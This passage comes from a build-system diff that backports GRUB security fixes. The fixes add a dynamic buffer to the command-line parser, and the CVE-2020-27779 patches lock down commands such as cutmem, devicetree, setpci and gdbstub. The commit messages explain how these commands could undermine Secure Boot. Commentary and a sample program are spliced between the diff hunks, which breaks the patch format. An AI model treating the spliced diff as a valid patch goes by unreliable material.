+@@ -116,17 +117,74 @@ add_var (char *varname, char **bp, char **vp,
+ /* Check if a variable was being read in and the end of the name
+ was reached. */
+ if (!(check_varstate (state) && !check_varstate (newstate)))
+- return;
++ return GRUB_ERR_NONE;
++
++ if (grub_buffer_append_char (varname, '\0') != GRUB_ERR_NONE)
++ return grub_errno;
+
+- *((*vp)++) = '\0';
+- val = grub_env_get (varname);
+- *vp = varname;
++ val = grub_env_get ((const char *) grub_buffer_peek_data (varname));
++ grub_buffer_reset (varname);
+ if (!val)
+- return;
++ return GRUB_ERR_NONE;
+
+ /* Insert the contents of the variable in the buffer. */
+- for (; *val; val++)
+- *((*bp)++) = *val;
++ return grub_buffer_append_data (buf, val, grub_strlen (val));
++}
++
++static grub_err_t
++terminate_arg (grub_buffer_t buffer, int *argc)
++{
++ grub_size_t unread = grub_buffer_get_unread_bytes (buffer);
++
++ if (unread == 0)
++ return GRUB_ERR_NONE;
++
++ if (*(const char *) grub_buffer_peek_data_at (buffer, unread - 1) == '\0')
++ return GRUB_ERR_NONE;
++
++ if (grub_buffer_append_char (buffer, '\0') != GRUB_ERR_NONE)
++ return grub_errno;
++
++ (*argc)++;
++
++ return GRUB_ERR_NONE;
++}
++
++static grub_err_t
++process_char (char c, grub_buffer_t buffer, grub_buffer_t varname,
++ grub_parser_state_t state, int *argc,
++ grub_parser_state_t *newstate)
++{
++ char use;
++
++ *newstate = grub_parser_cmdline_state (state, c, &use);
++
++ /*
++ * If a variable was being processed and this character does
++ * not describe the variable anymore, write the variable to
++ * the buffer.
++ */
++ if (add_var (varname, buffer, state, *newstate) != GRUB_ERR_NONE)
++ return grub_errno;
++
++ if (check_varstate (*newstate))
++ {
++ if (use)
++ return grub_buffer_append_char (varname, use);
++ }
++ else if (*newstate == GRUB_PARSER_STATE_TEXT &&
++ state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
++ {
++ /*
++ * Don't add more than one argument if multiple
++ * spaces are used.
++ */
++ return terminate_arg (buffer, argc);
++ }
++ else if (use)
++ return grub_buffer_append_char (buffer, use);
++
++ return GRUB_ERR_NONE;
+ }
+
+ grub_err_t
+@@ -135,24 +193,36 @@ grub_parser_split_cmdline (const char *cmdline,
+ int *argc, char ***argv)
+ {
+ grub_parser_state_t state = GRUB_PARSER_STATE_TEXT;
+- /* XXX: Fixed size buffer, perhaps this buffer should be dynamically
+- allocated. */
+- char buffer[1024];
+- char *bp = buffer;
++ grub_buffer_t buffer, varname;
+ char *rd = (char *) cmdline;
+- char varname[200];
+- char *vp = varname;
+- char *args;
++ char *rp = rd;
+ int i;
+
+ *argc = 0;
+ *argv = NULL;
++
++ buffer = grub_buffer_new (1024);
++ if (buffer == NULL)
++ return grub_errno;
++
++ varname = grub_buffer_new (200);
++ if (varname == NULL)
++ goto fail;
++
+ do
+ {
+- if (!rd || !*rd)
++ if (rp == NULL || *rp == '\0')
+ {
++ if (rd != cmdline)
++ {
++ grub_free (rd);
++ rd = rp = NULL;
++ }
+ if (getline)
+- getline (&rd, 1, getline_data);
++ {
++ getline (&rd, 1, getline_data);
++ rp = rd;
++ }
+ else
+ break;
+ }
+@@ -160,39 +230,14 @@ grub_parser_split_cmdline (const char *cmdline,
+ if (!rd)
+ break;
+
+- for (; *rd; rd++)
++ for (; *rp != '\0'; rp++)
+ {
+ grub_parser_state_t newstate;
+- char use;
+
+- newstate = grub_parser_cmdline_state (state, *rd, &use);
++ if (process_char (*rp, buffer, varname, state, argc,
++ &newstate) != GRUB_ERR_NONE)
++ goto fail;
+
+- /* If a variable was being processed and this character does
+- not describe the variable anymore, write the variable to
+- the buffer. */
+- add_var (varname, &bp, &vp, state, newstate);
+-
+- if (check_varstate (newstate))
+- {
+- if (use)
+- *(vp++) = use;
+- }
+- else
+- {
+- if (newstate == GRUB_PARSER_STATE_TEXT
+- && state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
+- {
+- /* Don't add more than one argument if multiple
+- spaces are used. */
+- if (bp != buffer && *(bp - 1))
+- {
+- *(bp++) = '\0';
+- (*argc)++;
+- }
+- }
+- else if (use)
+- *(bp++) = use;
+- }
+ state = newstate;
+ }
+ }
+@@ -200,43 +245,60 @@ grub_parser_split_cmdline (const char *cmdline,
+
+ /* A special case for when the last character was part of a
+ variable. */
+- add_var (varname, &bp, &vp, state, GRUB_PARSER_STATE_TEXT);
++ if (add_var (varname, buffer, state, GRUB_PARSER_STATE_TEXT) != GRUB_ERR_NONE)
++ goto fail;
+
+- if (bp != buffer && *(bp - 1))
+- {
+- *(bp++) = '\0';
+- (*argc)++;
+- }
++ /* Ensure that the last argument is terminated. */
++ if (terminate_arg (buffer, argc) != GRUB_ERR_NONE)
++ goto fail;
+
+ /* If there are no args, then we're done. */
+ if (!*argc)
+- return 0;
+-
+- /* Reserve memory for the return values. */
+- args = grub_malloc (bp - buffer);
+- if (!args)
+- return grub_errno;
+- grub_memcpy (args, buffer, bp - buffer);
++ {
++ grub_errno = GRUB_ERR_NONE;
++ goto out;
++ }
+
+ *argv = grub_calloc (*argc + 1, sizeof (char *));
+ if (!*argv)
+- {
+- grub_free (args);
+- return grub_errno;
+- }
++ goto fail;
+
+ /* The arguments are separated with 0's, setup argv so it points to
+ the right values. */
+- bp = args;
+ for (i = 0; i < *argc; i++)
+ {
+- (*argv)[i] = bp;
+- while (*bp)
+- bp++;
+- bp++;
++ char *arg;
++
++ if (i > 0)
++ {
++ if (grub_buffer_advance_read_pos (buffer, 1) != GRUB_ERR_NONE)
++ goto fail;
++ }
++
++ arg = (char *) grub_buffer_peek_data (buffer);
++ if (arg == NULL ||
++ grub_buffer_advance_read_pos (buffer, grub_strlen (arg)) != GRUB_ERR_NONE)
++ goto fail;
++
++ (*argv)[i] = arg;
+ }
+
+- return 0;
++ /* Keep memory for the return values. */
++ grub_buffer_take_data (buffer);
++
++ grub_errno = GRUB_ERR_NONE;
++
++ out:
++ if (rd != cmdline)
++ grub_free (rd);
++ grub_buffer_free (buffer);
++ grub_buffer_free (varname);
++
++ return grub_errno;
++
++ fail:
++ grub_free (*argv);
++ goto out;
+ }
+
+ /* Helper for grub_parser_execute. */
+diff --git a/include/grub/buffer.h b/include/grub/buffer.h
+new file mode 100644
+index 0000000..f4b10cf
+--- /dev/null
++++ b/include/grub/buffer.h
+@@ -0,0 +1,144 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2021 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_BUFFER_H
++#define GRUB_BUFFER_H 1
++
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++struct grub_buffer
++{
++ grub_uint8_t *data;
++ grub_size_t sz;
++ grub_size_t pos;
++ grub_size_t used;
++};
++
++/*
++ * grub_buffer_t represents a simple variable sized byte buffer with
++ * read and write cursors. It currently only implements
++ * functionality required by the only user in GRUB (append byte[s],
++ * peeking data at a specified position and updating the read cursor.
++ * Some things that this doesn't do yet are:
++ * - Reading a portion of the buffer by copying data from the current
++ * read position in to a caller supplied destination buffer and then
++ * automatically updating the read cursor.
++ * - Dropping the read part at the start of the buffer when an append
++ * requires more space.
++ */
++typedef struct grub_buffer *grub_buffer_t;
++
++/* Allocate a new buffer with the specified initial size. */
++extern grub_buffer_t grub_buffer_new (grub_size_t sz);
++
++/* Free the buffer and its resources. */
++extern void grub_buffer_free (grub_buffer_t buf);
++
++/* Return the number of unread bytes in this buffer. */
++static inline grub_size_t
++grub_buffer_get_unread_bytes (grub_buffer_t buf)
++{
++ return buf->used - buf->pos;
++}
++
++/*
++ * Ensure that the buffer size is at least the requested
++ * number of bytes.
++ */
++extern grub_err_t grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req);
++
++/*
++ * Append the specified number of bytes from the supplied
++ * data to the buffer.
++ */
++static inline grub_err_t
++grub_buffer_append_data (grub_buffer_t buf, const void *data, grub_size_t len)
++{
++ grub_size_t req;
++
++ if (grub_add (buf->used, len, &req))
++ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++ if (grub_buffer_ensure_space (buf, req) != GRUB_ERR_NONE)
++ return grub_errno;
++
++ grub_memcpy (&buf->data[buf->used], data, len);
++ buf->used = req;
++
++ return GRUB_ERR_NONE;
++}
++
++/* Append the supplied character to the buffer. */
++static inline grub_err_t
++grub_buffer_append_char (grub_buffer_t buf, char c)
++{
++ return grub_buffer_append_data (buf, &c, 1);
++}
++
++/*
++ * Forget and return the underlying data buffer. The caller
++ * becomes the owner of this buffer, and must free it when it
++ * is no longer required.
++ */
++extern void *grub_buffer_take_data (grub_buffer_t buf);
++
++/* Reset this buffer. Note that this does not deallocate any resources. */
++void grub_buffer_reset (grub_buffer_t buf);
++
++/*
++ * Return a pointer to the underlying data buffer at the specified
++ * offset from the current read position. Note that this pointer may
++ * become invalid if the buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data_at (grub_buffer_t buf, grub_size_t off)
++{
++ if (grub_add (buf->pos, off, &off))
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected."));
++ return NULL;
++ }
++
++ if (off >= buf->used)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("peek out of range"));
++ return NULL;
++ }
++
++ return &buf->data[off];
++}
++
++/*
++ * Return a pointer to the underlying data buffer at the current
++ * read position. Note that this pointer may become invalid if the
++ * buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data (grub_buffer_t buf)
++{
++ return grub_buffer_peek_data_at (buf, 0);
++}
++
++/* Advance the read position by the specified number of bytes. */
++extern grub_err_t grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n);
++
++#endif /* GRUB_BUFFER_H */
+--
+2.25.1
+
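For context, a minimal usage sketch of the grub_buffer API introduced above (the helper below is hypothetical, not part of the patch): the buffer grows on demand with overflow-checked arithmetic, and the caller can detach the bytes once the content is complete.

#include <grub/buffer.h>
#include <grub/misc.h>

/* Hypothetical helper: build a NUL-terminated copy of a string through a
 * grub_buffer and hand ownership of the bytes back to the caller. */
static char *
copy_string_via_buffer (const char *s)
{
  grub_buffer_t buf;
  char *result = NULL;

  buf = grub_buffer_new (16);                    /* initial size; grows as needed */
  if (buf == NULL)
    return NULL;

  if (grub_buffer_append_data (buf, s, grub_strlen (s)) != GRUB_ERR_NONE ||
      grub_buffer_append_char (buf, '\0') != GRUB_ERR_NONE)
    goto done;

  result = (char *) grub_buffer_take_data (buf); /* caller now owns the bytes */

 done:
  grub_buffer_free (buf);                        /* safe: data was detached or is freed here */
  return result;
}

This mirrors what the reworked grub_parser_split_cmdline() does: append under bounds checks, take the data on success, and free the buffer object either way.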
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
new file mode 100644
index 0000000000..c82423b8af
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
@@ -0,0 +1,70 @@
+From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 14 Oct 2020 16:33:42 +0200
+Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown
+ is enforced
+
+The cutmem and badram commands can be used to remove EFI memory regions
+and potentially disable the UEFI Secure Boot. Prevent the commands from being
+registered if GRUB is locked down.
+
+Fixes: CVE-2020-27779
+
+Reported-by: Teddy Reed <teddy.reed@gmail.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 4 ++++
+ grub-core/mmap/mmap.c | 13 +++++++------
+ 2 files changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 47ac7ff..a1aaee6 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
++
+ @node blocklist
+ @subsection blocklist
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 57b4e9a..7ebf32e 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -20,6 +20,7 @@
+ #include <grub/memory.h>
+ #include <grub/machine/memory.h>
+ #include <grub/err.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut;
+
+ GRUB_MOD_INIT(mmap)
+ {
+- cmd = grub_register_command ("badram", grub_cmd_badram,
+- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
+- N_("Declare memory regions as faulty (badram)."));
+- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem,
+- N_("FROM[K|M|G] TO[K|M|G]"),
+- N_("Remove any memory regions in specified range."));
++ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram,
++ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
++ N_("Declare memory regions as faulty (badram)."));
++ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem,
++ N_("FROM[K|M|G] TO[K|M|G]"),
++ N_("Remove any memory regions in specified range."));
+
+ }
+
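The change keeps the commands out of reach when lockdown is enforced. A standalone sketch of the gating idea (plain C; names invented, and this is not the actual grub_register_command_lockdown() implementation, which may instead register an error stub):

#include <stdio.h>

static int lockdown_enforced = 1;   /* would reflect the platform lockdown state */

typedef int (*command_fn) (int argc, char **argv);

/* Registration wrapper: commands registered through here are unavailable
 * while lockdown is enforced. */
static int register_command_lockdown (const char *name, command_fn fn)
{
  (void) fn;
  if (lockdown_enforced)
    {
      printf ("%s: not available when lockdown is enforced\n", name);
      return -1;
    }
  printf ("%s: registered\n", name);
  return 0;
}

static int cmd_cutmem (int argc, char **argv) { (void) argc; (void) argv; return 0; }

int main (void)
{
  register_command_lockdown ("cutmem", cmd_cutmem);
  return 0;
}

The same wrapper is applied to setpci, hdparm, the gdbstub commands, the XNU extension loaders and the BIOS/device tree loaders in the follow-up patches below.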
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
new file mode 100644
index 0000000000..e33c96a05b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
@@ -0,0 +1,105 @@
+From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 09:00:05 +0100
+Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs
+ when locked down
+
+There are some more commands that should be restricted when GRUB is
+locked down. The following is the list of commands and the reasons to restrict them:
+
+ * fakebios: creates BIOS-like structures for backward compatibility with
+ existing OSes. This should not be allowed when locked down.
+
+ * loadbios: reads a BIOS dump from storage and loads it. This action
+ should not be allowed when locked down.
+
+ * devicetree: loads a Device Tree blob and passes it to the OS. It replaces
+ any Device Tree provided by the firmware. This also should
+ not be allowed when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/commands/efi/loadbios.c | 16 ++++++++--------
+ grub-core/loader/arm/linux.c | 6 +++---
+ grub-core/loader/efi/fdt.c | 4 ++--
+ 4 files changed, 16 insertions(+), 13 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index a1aaee6..ccf1908 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux
+ kernel. Does not perform merging with any device tree supplied by firmware,
+ but rather replaces it completely.
+ @ref{GNU/Linux}.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node distrust
+diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c
+index d41d521..5c7725f 100644
+--- a/grub-core/commands/efi/loadbios.c
++++ b/grub-core/commands/efi/loadbios.c
+@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios;
+
+ GRUB_MOD_INIT(loadbios)
+ {
+- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios,
+- 0, N_("Create BIOS-like structures for"
+- " backward compatibility with"
+- " existing OS."));
+-
+- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios,
+- N_("BIOS_DUMP [INT10_DUMP]"),
+- N_("Load BIOS dump."));
++ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios,
++ 0, N_("Create BIOS-like structures for"
++ " backward compatibility with"
++ " existing OS."));
++
++ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios,
++ N_("BIOS_DUMP [INT10_DUMP]"),
++ N_("Load BIOS dump."));
+ }
+
+ GRUB_MOD_FINI(loadbios)
+diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c
+index d70c174..ed23dc7 100644
+--- a/grub-core/loader/arm/linux.c
++++ b/grub-core/loader/arm/linux.c
+@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux)
+ 0, N_("Load Linux."));
+ cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd,
+ 0, N_("Load initrd."));
+- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree,
+- /* TRANSLATORS: DTB stands for device tree blob. */
+- 0, N_("Load DTB file."));
++ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree,
++ /* TRANSLATORS: DTB stands for device tree blob. */
++ 0, N_("Load DTB file."));
+ my_mod = mod;
+ current_fdt = (const void *) grub_arm_firmware_get_boot_data ();
+ machine_type = grub_arm_firmware_get_machine_type ();
+diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c
+index ee9c559..003d07c 100644
+--- a/grub-core/loader/efi/fdt.c
++++ b/grub-core/loader/efi/fdt.c
+@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree;
+ GRUB_MOD_INIT (fdt)
+ {
+ cmd_devicetree =
+- grub_register_command ("devicetree", grub_cmd_devicetree, 0,
+- N_("Load DTB file."));
++ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0,
++ N_("Load DTB file."));
+ }
+
+ GRUB_MOD_FINI (fdt)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
new file mode 100644
index 0000000000..f9a6a73ebc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
@@ -0,0 +1,37 @@
+From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 22:59:59 +0100
+Subject: [PATCH] commands/setpci: Restrict setpci command when locked down
+
+This command can set PCI device register values, which makes it dangerous
+in a locked-down configuration. Restrict it so it can't be used in this setup.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/setpci.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c
+index d5bc97d..fa2ba7d 100644
+--- a/grub-core/commands/setpci.c
++++ b/grub-core/commands/setpci.c
+@@ -329,10 +329,10 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(setpci)
+ {
+- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0,
+- N_("[-s POSITION] [-d DEVICE] [-v VAR] "
+- "REGISTER[=VALUE[:MASK]]"),
+- N_("Manipulate PCI devices."), options);
++ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0,
++ N_("[-s POSITION] [-d DEVICE] [-v VAR] "
++ "REGISTER[=VALUE[:MASK]]"),
++ N_("Manipulate PCI devices."), options);
+ }
+
+ GRUB_MOD_FINI(setpci)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
new file mode 100644
index 0000000000..a756f8d1cf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
@@ -0,0 +1,35 @@
+From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 12:59:29 +0100
+Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down
+
+The command can be used to get/set ATA disk parameters. Some of these can
+be dangerous since they change the disk behavior. Restrict it when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hdparm.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c
+index d3fa966..2e2319e 100644
+--- a/grub-core/commands/hdparm.c
++++ b/grub-core/commands/hdparm.c
+@@ -436,9 +436,9 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(hdparm)
+ {
+- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0,
+- N_("[OPTIONS] DISK"),
+- N_("Get/set ATA disk parameters."), options);
++ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0,
++ N_("[OPTIONS] DISK"),
++ N_("Get/set ATA disk parameters."), options);
+ }
+
+ GRUB_MOD_FINI(hdparm)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
new file mode 100644
index 0000000000..b52273ff50
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
@@ -0,0 +1,62 @@
+From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 15:03:26 +0100
+Subject: [PATCH] gdb: Restrict GDB access when locked down
+
+The gdbstub* commands allow starting and controlling a GDB stub running on
+the local host that a remote debugger can connect to. Restrict
+this functionality when GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gdb/gdb.c | 32 ++++++++++++++++++--------------
+ 1 file changed, 18 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c
+index 847a1e1..1818cb6 100644
+--- a/grub-core/gdb/gdb.c
++++ b/grub-core/gdb/gdb.c
+@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break;
+ GRUB_MOD_INIT (gdb)
+ {
+ grub_gdb_idtinit ();
+- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub,
+- N_("PORT"),
+- /* TRANSLATORS: GDB stub is a small part of
+- GDB functionality running on local host
+- which allows remote debugger to
+- connect to it. */
+- N_("Start GDB stub on given port"));
+- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break,
+- /* TRANSLATORS: this refers to triggering
+- a breakpoint so that the user will land
+- into GDB. */
+- 0, N_("Break into GDB"));
+- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop,
+- 0, N_("Stop GDB stub"));
++ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub,
++ N_("PORT"),
++ /*
++ * TRANSLATORS: GDB stub is a small part of
++ * GDB functionality running on local host
++ * which allows remote debugger to
++ * connect to it.
++ */
++ N_("Start GDB stub on given port"));
++ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break,
++ /*
++ * TRANSLATORS: this refers to triggering
++ * a breakpoint so that the user will land
++ * into GDB.
++ */
++ 0, N_("Break into GDB"));
++ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop,
++ 0, N_("Stop GDB stub"));
+ }
+
+ GRUB_MOD_FINI (gdb)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
new file mode 100644
index 0000000000..474826ade5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
@@ -0,0 +1,61 @@
+From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 14:44:38 +0100
+Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when
+ locked down
+
+The shim_lock verifier validates the XNU kernels but not their extensions
+and packages. Prevent these from being loaded when GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 31 +++++++++++++++++--------------
+ 1 file changed, 17 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 77d7060..07232d2 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu)
+ N_("Load XNU image."));
+ cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64,
+ 0, N_("Load 64-bit XNU image."));
+- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0,
+- N_("Load XNU extension package."));
+- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0,
+- N_("Load XNU extension."));
+- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir,
+- /* TRANSLATORS: OSBundleRequired is a
+- variable name in xnu extensions
+- manifests. It behaves mostly like
+- GNU/Linux runlevels.
+- */
+- N_("DIRECTORY [OSBundleRequired]"),
+- /* TRANSLATORS: There are many extensions
+- in extension directory. */
+- N_("Load XNU extension directory."));
++ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0,
++ N_("Load XNU extension package."));
++ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0,
++ N_("Load XNU extension."));
++ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir,
++ /*
++ * TRANSLATORS: OSBundleRequired is
++ * a variable name in xnu extensions
++ * manifests. It behaves mostly like
++ * GNU/Linux runlevels.
++ */
++ N_("DIRECTORY [OSBundleRequired]"),
++ /*
++ * TRANSLATORS: There are many extensions
++ * in extension directory.
++ */
++ N_("Load XNU extension directory."));
+ cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0,
+ /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */
+ N_("Load XNU ramdisk. "
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
new file mode 100644
index 0000000000..e5d372a2b1
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
